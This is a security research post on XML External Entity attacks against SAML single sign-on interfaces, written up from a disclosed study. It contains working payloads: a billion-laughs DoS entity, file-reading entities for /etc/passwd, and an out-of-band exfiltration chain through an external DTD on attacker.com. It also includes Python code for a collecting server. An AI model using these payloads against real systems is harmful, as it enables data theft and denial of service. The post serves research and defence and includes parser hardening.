Detecting and exploiting XXE in SAML Interfaces
This post describes some findings, problems and insights regarding XML External Entity Attacks (XXEA) that we gathered during a large-scale security analysis of several SAML interfaces.
XXEA has been a popular attack class in recent months, see for example:
- How we got read access on Google’s production servers
- XXE in OpenID: one bug to rule them all, or how I found a Remote Code Execution flaw affecting Facebook's servers
First, we introduce the concept of Document Type Definition (DTD) and XML External Entity (XXE), and afterwards some basics on SAML. If you are familiar with these concepts, you may want to skip these sections and go directly to the last section, XXEA on SAML.
Document Type Definition (DTD) and XML External Entity (XXE)
Understanding DTD
XML offers the possibility to describe the document’s structure by using a Document Type Definition (DTD).
This is well known from classical HTML documents:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
...
Many people think that the declaration above just indicates that the content within the document contains HTML 4.01 data, but technically, there is more.
This declaration defines the HTML doctype that is identified by "-//W3C//DTD HTML 4.01 Transitional//EN". The exact definition is publicly available and the URL contains its declaration:
% curl -D- http://www.w3.org/TR/html4/loose.dtd
HTTP/1.1 200 OK
...
Content-Type: text/plain
<!ENTITY % HTML.Version "-//W3C//DTD HTML 4.01 Transitional//EN"...
<!ENTITY % HTML.Frameset "IGNORE">
<!ENTITY % ContentType "CDATA"
It now depends on the document parser whether this URL is resolved or not. There are good reasons not to curl the DTD every time, for instance, to save time. Additionally, it is not needed for HTML because this DTD is well known and most probably hard-coded in any browser.
Understanding XML Entity
However, the concept of DTD is generic and offers more features. For example, a DTD allows defining an ENTITY:
<!DOCTYPE Response [
<!ENTITY msg 'Hello World'>
]>
<Response>&msg;</Response>
In this case, the Entity msg is defined as the String 'Hello World'. This concept is also very widespread in HTML, for example, &lt; (<) or &amp; (&) can be used to encode specific characters (these are default HTML Entities that are defined by the DTD).
Technically, the XML/HTML parser that processes the given document resolves each ENTITY, for instance, it replaces &msg; by the String 'Hello World'.
Entity resolving is not problematic per se, but it can lead to efficient Denial-of-Service (DoS) Attacks if used like this:
<!DOCTYPE Response [
<!ENTITY a 'aaaaaa'>
<!ENTITY b '&a;&a;&a;&a;&a;'>
<!ENTITY c '&b;&b;&b;&b;&b;'>
...
<!ENTITY z '&y;&y;&y;&y;&y;'>
]>
<Response>&z;</Response>
By parsing this message, the entity &z; is recursively resolved, which leads to high memory consumption. This attack is also known as the Billion laughs attack.
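To get a feeling for the growth, the following Python sketch computes the length of the fully expanded entity. It assumes, as in the example above, a 6-character base entity and five references per level, and that the entities elided by "..." follow the same pattern. The function name is ours and only serves as an illustration.

```python
def expanded_length(base_len: int, fanout: int, levels: int) -> int:
    """Length of the fully expanded top-level entity.

    base_len: length of the innermost entity value (entity a above).
    fanout:   number of references each entity makes to the previous one.
    levels:   number of entities stacked on top of the base entity.
    """
    return base_len * fanout ** levels


# Entities a..z: 'a' is the base, b..z add 25 further levels (assumption).
size = expanded_length(base_len=6, fanout=5, levels=25)
print(f"{size:,} characters after expansion")
```

Under these assumptions the result is on the order of 10^18 characters, although the message itself is only a few hundred bytes long.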
Understanding XML External Entity
In addition to XML Entities, DTDs offer the ability to define External Entities. The concept is similar to the HTML definition above:
<!DOCTYPE Message [
<!ENTITY msg SYSTEM '/etc/hostname'>
]>
<Message>&msg;</Message>
Instead of defining a simple string for the Entity msg, this example lets the document parser load the content of a specified file, for instance, the '/etc/hostname' file.
There are several ways to do this:
<!ENTITY msg SYSTEM '/etc/hostname'>
<!ENTITY msg SYSTEM 'file:///etc/hostname'>
<!ENTITY msg SYSTEM 'http://myserver.com/something'>
<!ENTITY msg PUBLIC 'm' '/etc/hostname'>
<!ENTITY msg PUBLIC 'm' 'file:///etc/hostname'>
<!ENTITY msg PUBLIC 'm' 'http://myserver.com/something'>
The examples above differ mainly in two aspects:
- SYSTEM vs PUBLIC: As indicated by the name, SYSTEM Entities are intended for files stored locally on the machine, whereas PUBLIC Entities are for content accessible from the internet, for example, the HTML definition mentioned earlier. PUBLIC Entities need an identifier (here: 'm'), but the value of the identifier does not matter.
- The protocol: Depending on the parser (and the programming language), it is possible to use the absolute path of a file or the file:// protocol. Most parsers additionally understand the http:// and https:// handlers and, for instance, Java also allows the jar:// protocol (which basically allows unzipping files).
XML External Entity Attack (XXEA)
An XML External Entity Attack works as follows:
- The attacker prepares an XML message together with a DTD as shown above. This message commonly includes an XXE that reads a locally stored file, for example '/etc/hostname'.
- The attacker sends the prepared XML message to the Web Application.
- The Web Application processes the incoming XML message. It parses the DTD, resolves the XXE, and then deals with the resulting XML.
- The Web Application sends an HTTP response to the attacker. For a successful XXEA, this response must somehow contain the content of the locally stored file, for example the '/etc/hostname' file.
On a very basic level, this can be compared to reflective XSS.
Preventing XXEA
Given the number of possibilities to mount an XXEA, its prevention is not that easy. It is additionally alarming that most XML parsers have DTD processing enabled by default (and therefore process XXE in most cases). This is, for instance, the case for the default Java XML parser. To mitigate XXEA, one has to configure the parser as follows:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
// not important to prevent XXEA
dbf.setNamespaceAware(true);
// validate document while parsing it
dbf.setValidating(true);
// do not expand entity reference nodes
dbf.setExpandEntityReferences(false);
// validate document against DTD
dbf.setFeature("http://xml.org/sax/features/validation", true);
// do not include external general entities
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
// do not include external parameter entities or the external DTD subset
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
// build the grammar but do not use the default attributes and attribute types information it contains
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-dtd-grammar", false);
// ignore the external DTD completely
dbf.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
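Independent of the parser configuration above, an application that never expects a DTD in incoming messages could also refuse any message that carries one. The following is only a minimal sketch of that idea in Python, using the standard library's expat bindings. The names reject_doctype and DoctypeForbidden are hypothetical, and the check is an assumption of ours, not part of the configuration shown above.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an incoming XML message contains a DOCTYPE declaration."""


def reject_doctype(xml_bytes: bytes) -> None:
    """Parse xml_bytes and raise DoctypeForbidden if a DOCTYPE is present."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Abort at the start of the DOCTYPE, before any entity
        # declaration inside it has been processed.
        raise DoctypeForbidden(f"DOCTYPE declaration found: {name}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


if __name__ == "__main__":
    reject_doctype(b"<Message>Hello World</Message>")  # passes silently
    try:
        reject_doctype(
            b"<!DOCTYPE Message [<!ENTITY msg SYSTEM '/etc/hostname'>]>"
            b"<Message>&msg;</Message>"
        )
    except DoctypeForbidden as err:
        print("rejected:", err)
```

Such a check only makes sense if no legitimate sender relies on a DTD, and it complements rather than replaces a hardened parser configuration.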
Security Assertion Markup Language (SAML)
The most important industry standard for Identity Management is the Security Assertion Markup Language (SAML). SAML is based on the eXtensible Markup Language (XML) and enables the secure exchange of XML-based authentication messages. In conjunction with Single Sign-On (SSO) systems, SAML especially offers a standardized format for authentication tokens.
The good thing first:
To understand how XXEA can be used in SAML, it is not necessary to understand exactly how SAML works.
All we need to know is:
- SAML Assertions are XML. This fact allows us to include a DTD.
- The XML message is transmitted to the server as a URL-encoded plus Base64-encoded String.
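This means that, in contrast to the first XXEA example, we are only able to read the content of a system resource using XXE, but we cannot simply send this content somewhere else so that it becomes accessible to the attacker.
The only thing that is sent back to the user (attacker) is whether the login was successful or not. During our study, only a few applications responded with a specific error message, and in no case did this message reflect any content from the SAML Assertion.
Thus, we had to find another way to retrieve the content of system resources.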
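The transport encoding mentioned in the list above can be sketched in a few lines of Python. The sketch assumes plain Base64 followed by URL encoding, as described in this post. Depending on the SAML binding, additional steps (for example, compression) may be required, which are not covered here. The function names are ours.

```python
import base64
from urllib.parse import quote, unquote


def encode_saml_message(xml: str) -> str:
    """Base64-encode the XML message, then URL-encode the result."""
    b64 = base64.b64encode(xml.encode("utf-8")).decode("ascii")
    # safe="" makes sure that '+', '/' and '=' are percent-encoded as well.
    return quote(b64, safe="")


def decode_saml_message(value: str) -> str:
    """Reverse of encode_saml_message, useful for inspecting captured messages."""
    return base64.b64decode(unquote(value)).decode("utf-8")


message = (
    "<!DOCTYPE Message [\n"
    "<!ENTITY msg SYSTEM '/etc/hostname'>\n"
    "]>\n"
    "<Message>&msg;</Message>"
)
encoded = encode_saml_message(message)
print(encoded)
```

Because an Assertion is just XML inside this encoding, a DTD can be added to the message before it is encoded and sent.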
XXEA on SAML
Detection Phase
Before we executed the XXEA, we started with the detection phase. The requirements for an XXEA are:
- The server processes DTD.
- XXE is allowed and processed within the DTD.
<!DOCTYPE Message [
<!ENTITY send SYSTEM "http://attacker.com/working">
]>
<Message>&send;</Message>
We set up a Web Server reachable at the domain "http://attacker.com". If the targeted Web Application processes the DTD correctly, our Web Server receives a GET request and XXEA might be possible.
If we do not receive a GET request, we try the same idea with PUBLIC instead of SYSTEM, because some parsers might disable SYSTEM processing while PUBLIC is still allowed.
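Both detection variants can be generated from one template. The following Python sketch is only an illustration: the function name is ours, and the PUBLIC identifier 'm' is an arbitrary placeholder, as in the earlier examples.

```python
from typing import List


def detection_payloads(callback_url: str) -> List[str]:
    """Build the SYSTEM and the PUBLIC variant of the detection message."""
    template = (
        "<!DOCTYPE Message [\n"
        "<!ENTITY send {declaration}>\n"
        "]>\n"
        "<Message>&send;</Message>"
    )
    declarations = [
        f'SYSTEM "{callback_url}"',      # first attempt
        f'PUBLIC "m" "{callback_url}"',  # fallback if SYSTEM is disabled
    ]
    return [template.format(declaration=d) for d in declarations]


for payload in detection_payloads("http://attacker.com/working"):
    print(payload)
    print()
```

Using a different callback path per variant (or per target) would make it easier to tell from the server log which message triggered a request.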
Exploit Phase
Since Web Applications using SAML do not reflect content from the SAML-Assertion, we wanted to send the content of the system resource as a GET parameter to our own server (http://attacker.com). The basic idea looks as follows:
<!DOCTYPE Message [
<!ENTITY file SYSTEM "/etc/hostname">
<!ENTITY send SYSTEM "http://attacker.com/?read=&file;">
]>
<Message>&send;</Message>
The code above does not work directly.
This is because External Entities must not be included in other External Entities. This means that most parsers will abort the DTD processing on finding the file Entity within the send Entity declaration.
Nevertheless, another DTD feature called Parameter Entities exists that allows bypassing this restriction. The idea is described in a Whitepaper on DTD and XXE Attacks by Morgan et al.
<!DOCTYPE Message [
<!ENTITY % file SYSTEM 'file:///etc/hostname'>
<!ENTITY % dtd SYSTEM 'http://attacker.com/mydtd'>
%dtd;]>
<Message>&send;</Message>
The above content is then Base64 plus URL-encoded and sent to the SAML-Endpoint URL of the Web Application. Please note that the Entity send within the <Message> Element is not directly defined in the DTD. It will be defined in the DTD that is loaded from 'http://attacker.com/mydtd' later on.
Parameter Entities look similar to common Entities but start with a percent character (%). They can be seen as a Meta Language for DTD (comparable to #define instructions in C/C++).
The Web Application processes the DTD as follows:
- The parser processes the first Parameter Entity % file, thus reading the content of the /etc/hostname system resource.
- It then processes the second Parameter Entity % dtd. This one forces the parser to load an External DTD that is provided by the attacker's HTTP server. The server responds with:
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://attacker.com/send/%file;'>">
%all;
- This file is immediately parsed and processed. It defines a Parameter Entity % all that declares an Entity send. The send Entity is an External Entity pointing again to the attacker's server. The URL Request contains the content of the file Parameter Entity. The last line contains only "%all;". This means that at this place, the content of the % all Entity will be placed. This is the declaration of the send Entity.
- The last line of the DTD in the attacker's message contains "%dtd;". This means that at this place, the content of the file 'http://attacker.com/mydtd' will be placed. This is (again) the declaration of the send Entity.
- Once the Web Application processes the line "<Message>&send;</Message>", the GET Request 'http://attacker.com/send/%file;' is executed, with %file; replaced by the file content, and the attacker receives the content of the '/etc/hostname' file.
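The attacker's side of the steps above can be sketched with Python's standard library. This is only an illustration under our own assumptions: the paths /mydtd and /send/ are taken from the example, while the function names, the Content-Type value and the in-memory list for received values are ours.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List, Optional
from urllib.parse import unquote


def build_external_dtd(base_url: str) -> bytes:
    """Return the external DTD shown above; base_url is the attacker's server."""
    template = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        "<!ENTITY % all \"<!ENTITY send SYSTEM '{base}/send/%file;'>\">\n"
        "%all;\n"
    )
    return template.format(base=base_url).encode("utf-8")


def extract_exfiltrated(path: str) -> Optional[str]:
    """Return the file content carried in a /send/<content> request path."""
    prefix = "/send/"
    if path.startswith(prefix):
        return unquote(path[len(prefix):])
    return None


def make_server(host: str, port: int, base_url: str, received: List[str]) -> HTTPServer:
    """Create (but do not start) a server that serves the DTD and records leaks."""

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            body = b""
            if self.path == "/mydtd":
                body = build_external_dtd(base_url)
            else:
                content = extract_exfiltrated(self.path)
                if content is not None:
                    received.append(content)
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)

        def log_message(self, fmt, *args):
            pass  # keep the sketch quiet

    return HTTPServer((host, port), Handler)
```

Calling serve_forever() on the returned server starts it. Every request to /send/... then appends the leaked content to the received list.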
Problems with this approach and their solutions
During our study, we found some interesting problems.
Firewall
Most Web Applications are behind a firewall. At the beginning of our evaluation, we used a Web Server that was reachable on http://attacker.com:9090. The problem with this approach was that some Web Applications were not allowed to send GET requests to port 9090 due to firewall policies. Once we changed our Server port to 80 (default HTTP), the detection phase was successful.
Special Characters and Linefeed
For the exploit phase, the attacker has to choose which file to read. We tried different ones. The most popular choice is the '/etc/passwd' file. However, this file might include whitespace, linefeeds and special characters.
Depending on the target Web Application and its XML parser, such content can cause problems. For example, whitespace and linefeeds within the GET request can break the parsing process, and characters like '<' can produce invalid XML that is no longer parseable.
Thus, we prefer to use the file '/etc/hostname' for testing purposes.
In PHP, there is a nice possibility to read arbitrary files by encoding them directly with Base64:
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd" >
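On the receiving side, the Base64 value has to be decoded again. A minimal Python sketch, assuming the value arrives as a (possibly URL-encoded) part of the GET request and that trailing padding may have been lost on the way. The function name is ours.

```python
import base64
from urllib.parse import unquote


def decode_exfiltrated(value: str) -> bytes:
    """Decode a Base64 value taken from the request path or query string."""
    raw = unquote(value)
    # Restore '=' padding in case it was stripped during transport.
    raw += "=" * (-len(raw) % 4)
    return base64.b64decode(raw)


print(decode_exfiltrated("aGVsbG8K"))
```

Since the file content is transported as Base64, linefeeds and characters like '<' no longer interfere with the XML or the URL.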
Load Balancers
We detected a strange behavior on some Web Applications. We sent several XXEA messages to them and tried to read the '/etc/hostname' file. It failed in some cases, but in other tries it was successful.
This is because the Web Application was behind a load balancer that delegates the requests to different servers.
On some of them, the '/etc/hostname' file exists, on others, it doesn't. This is, for example, the case for CentOS Servers.
We looked at the User-Agent of the Web Application that sends the request to attacker.com and found out that they differ randomly, for instance, User-Agent: Java/1.6.0_45 and User-Agent: Java/1.7.0_55. This indicates that different Servers process the requests.
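Such an observation can be made systematically by counting the User-Agent values of the incoming requests. The Python sketch below is only an illustration. The observed list is made up from the two values mentioned above, and the function name is ours.

```python
from collections import Counter
from typing import Iterable


def count_user_agents(user_agents: Iterable[str]) -> Counter:
    """Count how often each User-Agent value was seen on the attacker's server."""
    return Counter(ua.strip() for ua in user_agents)


# Illustrative values only, not actual measurement data.
observed = ["Java/1.6.0_45", "Java/1.7.0_55", "Java/1.6.0_45"]
counts = count_user_agents(observed)
if len(counts) > 1:
    print("Different backends seem to process the requests:", dict(counts))
```

More than one distinct value for the same target is a hint, not a proof, that several servers sit behind one endpoint.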
Evaluation Results
During our study, we evaluated 22 Software-as-a-Service Web Applications that support Single Sign-On via SAML. Ten of them were vulnerable to XXEA, and we have reported our results to them.
Conclusion
Our study showed that XXEA is a real threat to SAML Applications. The biggest problem is that DTD processing, which is a prerequisite for XXEA, is enabled by default in most XML parsers, but developers seem not to be aware of that feature.
The full paper can be found here:
http://nds.rub.de/research/publications/saml-saas/
Authors of this Post
Vladislav Mladenov
Christian Mainka (@CheariX)